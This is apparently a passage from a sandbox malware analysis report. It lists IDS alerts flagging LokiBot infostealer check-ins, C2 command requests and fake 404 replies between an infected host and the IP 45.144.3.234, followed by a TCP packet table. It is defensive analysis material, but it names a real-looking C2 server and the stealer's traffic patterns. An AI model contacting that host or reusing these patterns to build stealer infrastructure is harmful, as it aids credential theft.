                                            12/02/20-11:54:30.266581TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.266581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.405566TCP2025483ET TROJAN LokiBot Fake 404 Response804998645.144.3.234192.168.2.6
                                            12/02/20-11:54:30.691282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.819381TCP2025483ET TROJAN LokiBot Fake 404 Response804998745.144.3.234192.168.2.6
                                            12/02/20-11:54:31.074450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.217477TCP2025483ET TROJAN LokiBot Fake 404 Response804998845.144.3.234192.168.2.6
                                            12/02/20-11:54:31.527811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.656363TCP2025483ET TROJAN LokiBot Fake 404 Response804998945.144.3.234192.168.2.6
                                            12/02/20-11:54:31.972080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.645.144.3.234
                                            12/02/20-11:54:32.100903TCP2025483ET TROJAN LokiBot Fake 404 Response804999045.144.3.234192.168.2.6
                                            12/02/20-11:54:32.430897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.565127TCP2025483ET TROJAN LokiBot Fake 404 Response804999145.144.3.234192.168.2.6
                                            12/02/20-11:54:32.886879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.645.144.3.234
                                            12/02/20-11:54:33.011949TCP2025483ET TROJAN LokiBot Fake 404 Response804999245.144.3.234192.168.2.6
                                            12/02/20-11:54:33.320496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.450376TCP2025483ET TROJAN LokiBot Fake 404 Response804999345.144.3.234192.168.2.6
                                            12/02/20-11:54:33.753310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2025381ET TROJAN LokiBot Checkin4999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.881657TCP2025483ET TROJAN LokiBot Fake 404 Response804999445.144.3.234192.168.2.6

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 2, 2020 11:52:41.373833895 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.425750971 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.425884008 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.429219961 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.481084108 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.481232882 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.532952070 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.556689978 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.556718111 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.556894064 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.557085037 CET4971280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.608752966 CET804971245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.805109024 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.858046055 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.859925985 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.861237049 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.913903952 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.914042950 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.966799974 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.989274979 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.989300013 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:41.989779949 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:41.989806890 CET4971380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.042948008 CET804971345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.134608984 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.187550068 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.187730074 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.190738916 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.243424892 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.243526936 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.296176910 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317408085 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317475080 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317636013 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.317660093 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.370023012 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.634788036 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.687304974 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.687475920 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.691672087 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.744510889 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.744729996 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.797485113 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818738937 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818770885 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818905115 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.818957090 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.873208046 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.165004015 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.218617916 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.218766928 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.223644972 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.276274920 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.279001951 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.331955910 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.354862928 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.354908943 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.355110884 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.355134964 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.408006907 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.715090036 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.780569077 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.780678988 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.786463022 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.841624022 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.841705084 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.892720938 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916834116 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916851044 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916938066 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.917032957 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.968146086 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.311971903 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.363648891 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.363820076 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.367507935 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.421521902 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.424026966 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.476854086 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495388985 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495414972 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495501041 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.495568037 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.547082901 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.757424116 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.809986115 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.813683987 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.817785978 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.871509075 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.872364044 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.925144911 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.947917938 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.947951078 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.948055983 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.948110104 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.000437021 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.613316059 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.666416883 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.666527987 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.670062065 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.721982956 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.722135067 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.774557114 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795233965 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795258045 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795373917 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.839304924 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.891160011 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.135173082 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.187201977 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.187385082 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.501884937 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.553736925 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.553891897 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.605909109 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626796007 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626816988 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626956940 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.627440929 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.679178953 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.143943071 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.196749926 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.196885109 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.200282097 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.253904104 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.253993034 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.308057070 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331655025 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331680059 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331810951 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.331890106 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.384161949 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.562874079 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.615319014 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.615433931 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.619406939 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.671931982 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.672055006 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.724229097 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748179913 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748205900 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748323917 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.748347998 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.801124096 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.993343115 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.045789003 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.045932055 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.049426079 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.111053944 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.111213923 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.163687944 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184302092 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184334040 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184492111 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.184588909 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.238178968 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.420404911 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.473089933 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.473290920 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.489829063 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.542267084 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.542445898 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.595082045 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616770983 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616822958 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616942883 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.617018938 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.669677973 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.824300051 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.877916098 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.878339052 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.881874084 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.933549881 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.933732033 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.985455990 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007215023 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007244110 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007407904 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.007437944 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.059087038 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.232285976 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.284529924 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.284663916 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.288846016 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.344180107 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.344322920 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.396284103 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418236971 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418268919 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418683052 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.418708086 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.471590996 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.696527004 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.749725103 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.749869108 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.753380060 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.806351900 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.806524038 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.860044956 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881766081 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881809950 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881970882 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.882067919 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.934818029 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.130819082 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.183549881 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.183809996 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.187410116 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.239682913 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.239814043 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.292112112 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313590050 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313632011 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313744068 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.313777924 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.366276979 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.572312117 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.625363111 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.625467062 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.629810095 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.681766987 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.681869030 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.733228922 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756248951 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756270885 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.756335974 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.756386995 CET4973180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.809437037 CET804973145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.014552116 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.067189932 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.067327976 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.071178913 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.123727083 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.123859882 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.176671028 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201095104 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201137066 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.201231956 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.201256037 CET4973280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.254654884 CET804973245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.432761908 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.484755993 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.484941959 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.489197016 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.541114092 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.541227102 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.600330114 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665469885 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665499926 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.665663004 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.665710926 CET4973380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.717617035 CET804973345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.930563927 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.983155966 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:51.986118078 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:51.988950968 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.041258097 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.041430950 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.096945047 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132110119 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132138014 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.132287979 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.132606030 CET4973480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.184711933 CET804973445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.433507919 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.486124039 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.488142967 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.491063118 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.543560982 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.544442892 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.596992016 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618566990 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618622065 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.618865013 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.618896008 CET4973580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.672725916 CET804973545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.824446917 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.877223015 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.877429962 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.880419970 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.938518047 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:52.938637018 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:52.994662046 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.017894030 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.017920971 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.018054962 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.018099070 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.124978065 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.125075102 CET4973780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.128633976 CET804973745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:53.270006895 CET4974080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:53.324171066 CET804974045.144.3.234192.168.2.6
